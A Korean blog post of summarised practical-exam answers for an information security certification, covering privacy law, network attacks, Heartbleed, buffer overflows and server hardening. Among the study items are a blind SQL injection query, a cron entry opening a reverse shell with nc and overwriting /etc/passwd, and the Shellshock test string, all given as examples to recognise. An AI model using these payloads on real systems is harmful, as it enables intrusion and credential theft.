본문 바로가기
정보보안기사, 정보보안산업기사

[정보보안기사/산업기사] 실기 문제풀이 총정리 요약본 3탄

by 시스코킹 2021. 6. 27.
반응형


영상정보처리장비를 이용하기 위해 안내문과 함께 설치를 진행하려고 한다. 영상정보처리기기 관련 법규에 따라 다음 괄호 안에 들어가야 할 내용은? ( 목 범 관 대 )
1) (설치 목적 및 장소)
2) 촬영 범위 및 시간
3) 관리책임자 성명 및 연락처
4) 그 밖에 대통령령으로 정하는 사항

 


개인정보 보호법령 및 하위 고시에 의거해 다음의 빈칸을 채우시오.
ㅇ 접근권한 부여·말소 등의 기록을 최소 ( 3년 )간 보관
ㅇ 접속기록은 최소 ( 1년 ) 이상 보관
ㅇ 단, 고유식별정보 또는 민감정보를 처리하는 경우 최소 ( 2년 ) 이상 보관
ㅇ 접속기록의 위·변조 방지를 위해 ( 월 1회 ) 이상 점검
 

 



쇼핑몰 사이트를 운영하는 정보통신 서비스 제공업체의 개인정보 취급자에게 적용되어야 하는 비밀번호 작성 규칙 3가지를 기술하시오.
1. 영문, 숫자, 특수문자 중 2종류 이상을 조합하여 최소 10자리 이상 또는 3종류 이상을 조합하여 최소 8자리 이상의 길이로 구성
2. 연속적인 숫자나 생일, 전화번호 등 추측하기 쉬운 개인정보 및 아이디와 비슷한 비밀번호는 사용하지 않는 것을 권고
3. 비밀번호에 유효기간을 설정하여 반기별 1회 이상 변경

 

 


Blind SQL Injection
SQL 인젝션을 통해 단순히 참 거짓을 판단할 수 있는 상황에서 실제 값을 파악하기 위한 공격
일반적인 SQL 인젝션에 대해 방어가 잘 되어 있는 경우라도 블라인드 SQL이 동작하는 경우가 많다.
ex)
SELECT * FROM users where id='admin' and ascii(substr(select pw from users where id = 'admin', 1, 1)) < 100 -- and pw='nomatter'
-본 SQL 인젝션을 통해 admin 계정 비밀번호의 첫번째 글자 아스키 코드가 100 이하인지 알 수 있다.
-이런 공격을 반복하면 한글자 한글자 파악 가능하다.

 

 


<정보보안기사-10회 참고>
주요정보통신기반시설의 지정 및 취약점 분석에 관한 기준이다. 빈 칸을 채우시오.
제8조(주요정보통신기반시설의 지정 등) ①중앙행정기관의 장은 소관분야의 정보통신기반시설중 다음 각호의 사항을 고려하여 전자적 침해행위로부터의 보호가 필요하다고 인정되는 정보통신기반시설을 주요정보통신기반시설로 지정할 수 있다.
(중 의 상 범 용)
1. 당해 정보통신기반시설을 관리하는 기관이 수행하는 업무의 국가사회적 중요성
2. 기관이 수행하는 업무의 정보통신기반시설에 대한 ( 의존도 )
3. 다른 정보통신기반시설과의 ( 상호연계성 )
4. 침해사고가 발생할 경우 국가안전보장과 경제사회에 미치는 피해규모 및 범위
5. 침해사고의 발생가능성 또는 그 복구의 ( 용이성 )

 

 


개인정보 안전성 확보조치를 기준으로 다음 빈칸에 들어갈 말을 적으시오.
ㅇ (개인정보처리시스템)이란 데이터베이스시스템 등 개인정보를 처리할 수 있도록 체계적으로 구성한 시스템을 말한다.
ㅇ (비밀번호)란 정보주체 또는 개인정보취급자 등이 개인정보처리시스템, 업무용 컴퓨터 또는 정보통신망 등에 접속할 때 식별자와 함께 입력하여 정당한 접속 권한을 가진 자라는 것을 식별할 수 있도록 시스템에 전달해야 하는 고유의 문자열로서 타인에게 공개되지 않는 정보를 말한다.
ㅇ 개인정보처리자는 인터넷 구간 및 인터넷 구간과 (내부망)의 중간 지점(DMZ : Demilitarized Zone)에 고유식별정보를 저장하는 경우에는 이를 암호화하여야 한다

 

1) 카나리 단어 기법 동작방식 : 스택가드(Stack Guard) 라고도 함, 메모리 상에서 프로그램의 복귀 주소(Return Address)와 변수/버퍼 사이에 특정 값(Canary)을 저장해두는 기법을 말한다.
2) 카나리 단어 기법 공격 차단 원리 : 버퍼오버플로우 발생 시 특정 값(Canary)의 변조가 발생하므로 이를 탐지하여 차단한다.
3) ASLR 기법 동작방식 : 메모리 공격을 방어하기 위해 주소 공간 배치를 난수화하는 기법을 말한다.
4) ASLR 기법 공격 차단 원리 : 실행 시 마다 메모리 주소를 변경시켜 버퍼 오버플로우를 통한 특정 주소 호출을 방지한다.

 

 


기업담당자는 정보보호에 관한법률에 의거하여 연1회 이용자들에게 메일을 통보해야한다. 메일에 들어가야할 정보를 나열하시오.
1) 개인정보의 수집.이용 및 수집한 개인정보의 항목
2) 개인정보를 제공받는 자와 그 제공 목적 및 제공한 개인정보의 항목
3) 개인정보 처리위탁을 받은 자 및 그 처리위탁을 하는 업무의 내용

 

 

 


1) 공격명 : Smurf 공격
2) 공격원리 : Smurf 공격은 출발지 IP를 희생자 IP로 위조한 후 증폭 네트워크로 ICMP Echo Request를 브로드캐스트 함으로써 다수의 ICMP Echo Reply가 희생자에게 전달되어 서비스 거부를 유발시킨다.
3) 대응방법
- 증폭 네트워크로 사용되는 것을 막기 위해 다른 네트워크로부터 자신의 네트워크로 들어오는 Directed Broadcast 패킷을 허용하지 않도록 라우터 설정을 한다.
- 브로드캐스트 주소로 전송된 ICMP Echo Request 메시지에 대해 응답하지 않도록 시스템 설정을 한다.

 



[root@qfran ~] ifconfig eth0
eth0: flags=12345 < UP, BROADCAST, RUNNING, PROMISC, SIMPLEX, MULTICAST > metric 0 mtu 1500 options=80009 ...
1) 예상되는 공격명 및 이유 : 스니핑(Sniffing) 공격, 화면에 표시된 인터페이스가 무차별 모드(PROMISC)로 동작하고 있기 때문에 해당 컴퓨터가 목적지가 아닌 패킷들도 모두 수신이 가능하기 때문에 스니핑(Sniffing) 공격이 발생한 것으로 예상됨.
2) 위 문제를 해결하기 위한 명령어 : ifconfig eth0 ( -promisc )
3) 현상태의 발생 시점을 찾기 위한 로그의 경로(파일명 포함) : /var/log/messages

 

 

 


<정보보안기사-7회 참고>
Portable Executable
윈도우에서 실행파일의 구조를 정의한 포맷이다. 윈도우에서 실행 가능한 EXE, SCR, DLL, OCX, SYS, OBJ 등의 확장자들은 모두 PE 포맷으로 작성된 것이다.
-구성
Dos Header
Dos Stub
PE Header
Section
.text
프로그램 실행을 위한 코드를 저장하고 있는 섹션
.data
읽기 쓰기가 가능한 영역으로 전역변수와 정적 변수 등이 위치하는 섹션
.rdata
읽기 전용 데이터 섹션으로 상수형 변수, 문자열 상수 등이 위치하는 섹션
.idata
임포트(import) 할 DLL과 그 API/함수에 대한 정보를 담고 있는 섹션

* .edata
Export할 데이터를 저장하고 있는 섹션(주로 dll파일들이 가지고 있다.)
.rsrc
아이콘, 커서 등 윈도우 APP 리소스 관련 데이터를 저장하고 있는 섹션
.bss
초기화 되지 않은 전역변수가 위치하는 섹션

IAT(Import Address Table)
응용 프로그램이 다른 모듈의 기능을 호출할 때 조회 테이블


 


익스플로잇과 관련된 다음 보기에 알맞은 용어를 넣으시오.
1) 실제로 기계어로 구성되어 Exploit의 본체에 해당하는 프로그램의 명칭은 무엇인가? 셸코드
2) x86계열에서 NOP(No Operation) code를 hex로 표현한 어느값인가?                 0x90
3) x86계열에서 ESP에 들어있는 값을 EIP로 이동하는 어셈블리 코드를 적으시오.    jump esp

 

 


윈도우 DNS 서버에서 DNS 설정 시 두 가지 절차를 거친다. 보기에서 설명하는 절차를 적으시오.
1) 도메인 DNS서버를 등록하는 절차              zone 영역등록
2) DNS 서버에 서비스정보를 입력하는 절차 호스트 등록

 

 

 


키로거는 사용자가 키보드로 PC에 입력하는 내용을 몰래 낚아채어 기록하는 행위를 말한다. 하드웨어, 소프트웨어를 활용한 방법에서부터 전자적, 음향기술을 활용한 기법까지 다양한 키로깅 방법이 존재한다. 다음은 사용자 몰래 키로거를 설치할 수 있는 방법들이다. 어떤 방법들인가?

 

1) 사용자가 접속한 웹페이지에서 팝업, iframe, 리다이렉트 등을 통해 사용자가 인식하지 못하게 악성코드를 다운로드 시키는 침해유형을 말한다.       드라이브바이다운로드
2) 정상 애플리케이션인 것처럼 배포된 뒤 자신의 내부에 압축해서 가지고 있던 코드를 이용하여 새로운 악성코드를 생성하여 시스템을 감염시킨다.      드롭퍼

 

 

 


네트워크 패킷을 분석할 수 있는 Wireshark에선 캡처된 파일에서 원하는 내용을 필터링하기 위한 디스플레이 필터(Display Filter)가 있다. 질의에 대한 응답 패킷만을 보기 위한 필터링 구문은?
dns.flags.response==1    
dns.flags.response==0 은 질의만을 보기 위한 옵션
dns.flags.response==1 은 질의 응답을 보기 위한 옵션

 

 


내부 관리계획
1. 개인정보관리책임자의 자격요건 및 지정에 관한 사항
2. 개인정보관리책임자와 개인정보취급자의 역할 및 책임에 관한 사항
3. 개인정보의 기술적·관리적 보호조치 이행 여부의 내부 점검에 관한 사항
4. 개인정보 처리업무를 위탁하는 경우 수탁자에 대한 관리 및 감독에 관한 사항
5. 개인정보의 분실·도난·누출·변조·훼손 등이 발생한 경우의 대응절차 및 방법에 관한 사항

 

 

 


개인정보 유출 통지
-통지·신고
유출된 개인정보의 정보주체에게 지체없이 통지하여야 한다.
유출된 정보주체의 수가 1천명 이상인 경우 행정안전부 장관 또는 한국인터넷진흥원에 신고하여야 한다.

 

-통지 기한
개인정보의 분실·도난·유출 사실을 안 때부터 24시간 이내
통지 대상의 연락처를 알 수 없는 등의 부득이한 사유가 있는 경우 예외 조치 가능
대통령령에 따른다.
전국구 일간지 등에 개재하는 등 다른 조치를 취해야 한다.

 

-통지 항목 5가지
유출등이 된 개인정보 항목
유출등이 발생한 시점과 경위
이용자가 취할 수 있는 조치
정보통신서비스 제공자등의 대응 조치
이용자가 상담 등을 접수할 수 있는 부서 및 연락처

 

 

 


0 0 6 * *   root   /bin/cp   /tmp/passwd1   /etc/passwd
0 0 12 * *   root   /usr/bin/nc   10.10.10.10 80 -e /bin/bash


1) 임의로 조작된 passwd 파일이 원래 passwd 파일을 덮어쓴다.
2) 10.10.10.10 호스트에 80포트로 연결한다. 리버스쉘의 위험이 있다.

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
1) 이 취약점의 이름은? 셸쇼크
2) 보기의 명령을 실행했을 때 취약점이 존재하는 경우와 존재하지 않는 경우의 결과를 설명하시오. 취약점이 있는 경우 vulnerable this is a test 라고 출력되고, 취약점이 없는 경우 this is a test라고만 출력된다.
3) 결과가 나오는 이유에 대해 설명하시오.
Bash쉘이 제공하는 함수 선언기능을 이용한 취약점이다. "() {"로 시작하는 함수 선언문 끝에 명령어를 삽입해 환경변수에 저장할 경우 삽입한 명령어까지 실행된다.

 

 

 


<정보보안기사-8회 참고>


MySQL은 가장 대중적으로 사용되는 공개 소프트웨어 DBMS이다. MySQL 설정파일인 my.cnf에 이 옵션을 추가할 경우 외부 네트워크 사용자의 접근을 제한하고 로컬에서만 접근할 수 있게 된다. 이 옵션은 무엇인가?  skip-networking

 


WEP 암호화 방식은 IEEE 802.11b 프로토콜에서 적용되기 시작하여 (RC4) 암호화 알고리즘을 사용한다.40비트 길이의 WEP 비밀키와 임의로 할당되는 24비트 ( IV(initialization Vector) ) 로 조합된 총 64비트의 키를 이용하여 (RC4) 알고리즘 암호화하는 방식이다.

 

 


(Set-UID) 권한이 부여된 파일을 실행하면 실행하는 동안 해당 파일의 소유자 권한으로 인식하다. (Set-GID) 권한은 실행하는 동안 해당 파일의 소유자 그룹 권한으로 인식한다. 
(Sticky-Bit) 권한은 디렉터리에만 적용되는 권한으로, 이 권한이 적용된 디렉터리엔 일반 사용자들이 자유롭게 파일을 쓸수 있지만 자신이 생성한 파일이 아니면 수정 삭제가 불가능하다.

 

 

 


다음은 DNS에 관한 설명이다. 빈칸에 들어갈 용어를 적으시오.
DNS 서버는 상위 DNS 서버에 질의하는 부하를 줄이기 위해 (캐시)를 이용한다. 적절한 주기의 갱신이 이루어지도록 하기 위해 이러한 (캐시)엔 유효기간이 있는데 이를 (TTL)라 한다.

 

 


고유식별정보를 처리하는 개인정보처리자는 인터넷 홈페이지를 통해 고유식별정보가 유출·변조·훼손되지 않도록 ( 연 1회 이상 취약점 )을 점검하고 필요한 보완 조치를 하여야 한다.

 

 


전송 모드(Transport Mode)
-보호 범위
IP 패킷 전체를 보호하는 것이 아니라 IP 헤더를 제외한 IP 패킷의 페이로드(Payload)만을 보호
IP 헤더는 암호화하지 않으므로 트래픽 경로는 노출된다.
-보호 구간
일반적으로 종단 노드(End Node) 구간의 IP 패킷 보호를 위해 사용한다.

 


터널 모드(Tunneling Mode)
-보호 범위
IP 패킷 전체를 보호
암호화된 패킷에 IP 패킷에 IPSec 헤더를 추가하여 라우팅을 수행한다.
IPSec 헤더는 구간 간 이동에 대한 정보만 있으므로 종단 정보(출발지, 목적지)와 트래픽 경로는 보호된다.
-보호 구간
일반적으로 터널/보안 게이트웨이 구간 또는 종단 노드와 터널/보안 게이트웨이 구간의 IP 패킷 보호를 위해 사용한다.

 

 


1) 파일 업로드의 취약점 확인 방법은 무엇인가? 
jsp, php, sh 등 실행 가능한 파일을 업로드하고 실행이 가능한지 확인한다.
2) 대응방법을 설명하시오.
확장자나 파일 헤더를 통해 이미지, 문서 등 정해진 파일만 올릴 수 있도록 하고 파일이 저장되는 디렉터리의 실행권한을 없앤다.

 

 


하트비트 (Heartbeat)
일종의 Echo Request/Echo Reply처럼 서버의 기동 여부를 진단하기 위한 프로토콜
특정 Echo Request를 보내고, 반환 받을 크기를 지정하면 해당 크기만큼 Echo Reply가 온다

하트블리드
• 1.01f 이전의 버전에서 발생한다.
• 하트비트(Heartbeat)라는 SSL/TLS 확장 프로토콜 동작 과정에서 발생한다.

- 반환 받을 크기 지정 시 보낸 메세지보다 훨씬 크게 지정(최대 64KB)하여 보낼 수 있는 취약점이 존재하였다.
- 1KB를 보내면서 64KB를 요청 할 경우 나머지 63KB는 메모리에 있는 임의 데이터가 보내진다.
- 위와 같은 동작을 반복하면 메모리상에 흐르는 임의 데이터를 지속적으로 탈취할 수 있다.

탐지
하트블리드 공격 시 하트비트 응답 패킷이 요청보다 응답이 비정상적으로 크게 나간다.
하트블리드 공격 시 SSL 서비스 포트로 |18 03 ??| 패턴의 데이터가 전송된다.

대응
- OpenSSL의 버전을 1.01g 이상으로 업그레이드한다.
- 서버측 SSL 비밀키가 유출되었을 가능성이 있으므로 SSL 서버 인증서를 재발급 한다.
- 시스템 이용자들의 비밀번호 유출되었을 가능성이 있으므로 변경을 안내한다.

 

 


ISMS 인증을 위해 정보보호정책을 수립하고 정책의 적용범위를 설정하였다. 정보보호정책이 공식문서로 인정 받기 위한 절차를 기술하시오.
1. 이해관련자 검토
2. 최고경영자(CEO) 승인
3. 모든 임직원 및 관련자에게 이해하기 쉬운 형태 전달(최신본 유지)

 

 


스택 버퍼 오버플로우 (Stack Buffer Overflow)
- 주로 SetUID가 설정된(루트 권한으로 실행되는) 프로그램들을 타겟으로 한다.
- 입력값에 수용 가능한 버퍼보다 큰 값을 입력하여 임의의 공격코드를 루트 권한으로 실행시킨다.
원리
- 프로그램에서 특정 함수를 실행시키면 스택에 이전 함수로 돌아가기 위한 주소가 기록된다. (함수에서 return이 호출되면 그 값과 함께 돌아갈 주소)
- 버퍼에 큰 값을 넣게 되면 이 스택 영역을 침범하게 된다.
- 리턴 주소가 들어갈 곳에 쉘코드나 다른 프로그램의 주소를 넣으면 그것이 실행되게 된다.


힙 버퍼 오버플로우 (Heap Buffer Overflow)
- 힙 데이터 영역에서 일어나는 버퍼 오버플로이다.
- 스택 오버플로우만큼 흔히 사용가능한 공격은 아니다.
- 동적 메모리 할당 연결(malloc 상위 수준 데이터)을 덮어씀으로써 프로그램 함수 포인터를 조작한다.

 

 


trustwave 사의 제품으로 아파치웹서버, IIS에서 사용가능 한 공개용 웹 어플리케이션 방화벽은 무엇인가?   ModSecurity

 

 


단편화된 IP패킷이다. 각 숫자가 의미하는 바를 적으시오
41421:48@2960+
1) 41421   - id : 원본 IP 데이터그램
2) 48      - size : 단편화 크기
3) 2960    - offset : 현재 위치

 

 


정보통신망법령에 따라 법에서 허용한 경우 외엔 주민등록번호를 취급해선 안 된다. 다음 법률 조항의 빈칸에 들어갈 발을 적으시오.
정보통신서비스 제공자는 다음 각 호의 어느 하나에 해당하는 경우를 제외하고는 이용자의 주민등록번호를 수집·이용할 수 없다.
1. 제23조의3에 따라 ( 본인확인기관 )으로 지정받은 경우
2. 법령에서 이용자의 주민등록번호 수집·이용을 허용하는 경우
3. 영업상 목적을 위하여 이용자의 주민등록번호 수집·이용이 불가피한 정보통신서비스 제공자로서 방송통신위원회가 고시하는 경우
② 제1항제2호 또는 제3호에 따라 주민등록번호를 수집·이용할 수 있는 경우에도 이용자의 주민등록번호를 사용하지 아니하고 본인을 확인하는 방법(이하  ( 대체수단 )이라 한다)을 제공하여야 한다.

 

 


SSL/TLS를 이루는 세부 프로토콜 중 레코드 프로토콜은 메시지를 암호화 하여 통신을 수행하는 역할을 한다. 레코드 프로토콜은 상위계층 메시지를 (단편화), (압축), (MAC), (암호화)와 같은 처리과정을 거쳐 헤더를 붙인 후 하위계층으로 전달한다.
( 단 압 맥 암 )

 

 


정보보호시스템 공통평가기준에 있는 내용이다. 빈칸을 채우시오
(보호프로파일 PP)(이)라 함은 평가대상 범주를 위한 특정 소비자의 요구에 부합하는 구현에 독립적인 보안요구사항의 집합을 말한다.
(보안목표명세서 ST)(이)라 함은 식별된 평가대상의 평가를 위한 근거로 사용되는 보안요구사항과 구현 명세의 집합을 말한다. -특정 식별 된 평가 대상 ( TOE )
(평가보증등급 EAL)(이)라 함은 공통평가기준에서 미리 정의된 보증수준을 가지는 보증 컴포넌트로 이루어진 패키지를 말한다.

 

 


공인인증서의 효력 소멸
- 공인인증서의 유효기간이 경과한 경우
- 공인인증기관의 지정이 취소된 경우
- 공인인증서의 효력이 정지된 경우
- 공인인증서가 폐지된 경우




공인인증서의 폐지
- 가입자 또는 그 대리인이 공인인증서의 폐지를 신청한 경우
- 가입자가 부정한 방법으로 공인인증서를 발급받은 경우
- 가입자가 사망, 실종선고 또는 해산된 경우
- 가입자의 전자서명생성정보가 분실/훼손/도난/유출된 경우

 

 


리눅스 xinetd
- 주요 구성
/etc/xinetd : 메인 설정파일
/etc/xinetd.d : 슈퍼데몬에 의해 제어되는 서비스 파일이 위치하는 디렉터리
/etc/rc.d/init.d/xinetd : xinetd를 제어하는 데몬 스크립트. start, stop, restart 등 사용

- 주요 내용 샘플
defaults
{
#       disabled        =
        log_type        = SYSLOG daemon info
        log_on_failure  = HOST
        log_on_success  = PID HOST DURATION EXIT
        cps             = 50 10
        instances       = 50
        per_source      = 10
        v6only          = no
        groups          = yes
        umask           = 002
}

- 설정 항목
log_type
SYSLOG와 FILE 두 가지 설정이 가능하다.
로그 기록을 syslog에 위임 할지, 별도 파일로 지정할지 선택한다.
ex) log_type = FILE /var/logs/xinet.log

 

log_on_failure
접속 실패 시 기록될 속성값을 지정한다,
속성값 : HOST, USERID, ATTEMPT
ex) log_on_failure = HOST

 

log_on_success
접속 성공 시 기록될 속성값을 지정한다.
속성값 : PID, HOST, USERID, EXIT, DURATION, TRAFFIC

 

cps
초당 요청받는 수를 제한한다.
cps [초당 요청수] [제한시간(초)]
ex) cps 50 10 (초당 요청수가 50 이상이면 10초간 접속을 제한한다.)

 

instances
동시에 서비스할 수 있는 최대 개수를 지정한다.
ex)instances = 50

 

per_source
같은 IP주소로 접속할 수 있는 서비스 수를 지정한다.
ex) per_source = 5

 

only_from
서비스를 이용할 수 있는 원격 호스트를 설정한다.
ex) 192.168.10.10 192.168.10.11 192.168.20.*

 

enabled
사용 가능한 항목을 설정한다. disabled항목에서 yes라고 설정 되어 있어도 허용한다.
ex) enabled telnet ftp

 

no_access
서비스를 이용할 수 없는 원격 호스트의 주소를 지정한다.
only_from 과 주소 지정법은 동일하고 중복 설정된 경우에는 차단된다.

 

access_times
지정된 시간에만 서비스를 이용할 수 있게 한다.

 

nice
서버의 우선순위를 지정한다. -20 ~ 19 사이의 정수를 입력한다.

 

wait
서비스가 단일 스레드(thread)인지 다중 스레드인지 지정한다.
yes 인 경우에는 오직 하나의 서비스만 작동하게 되며, no 인 경우에는 다중 스레드로 동작한다.



다음은 유닉스(솔라리스) 커널 보안 설정에 관한 문제이다. 커널 컴파일 용도로 활용하는 아래 ndd 명령어와 관련된 공격명과 명령의 의미를 쓰시오.
(1) ndd -set /dev/ip ip_forward_directed_broadcasts 0
1) 스머프 공격에 대응하기 위한 커널 파라미터 설정
Directed broadcasts IP 패킷이 포워딩되는것을 허용하지 않는다

(2) ndd -set /dev/tcp tcp_conn_req_max_q0 1024
2) TCP Syn Flooding 공격에 대응하기 위한 파라미터 설정
TCP 연결요청대기큐(Backlog Queue)의 크기를 1024로 늘린다

반응형

댓글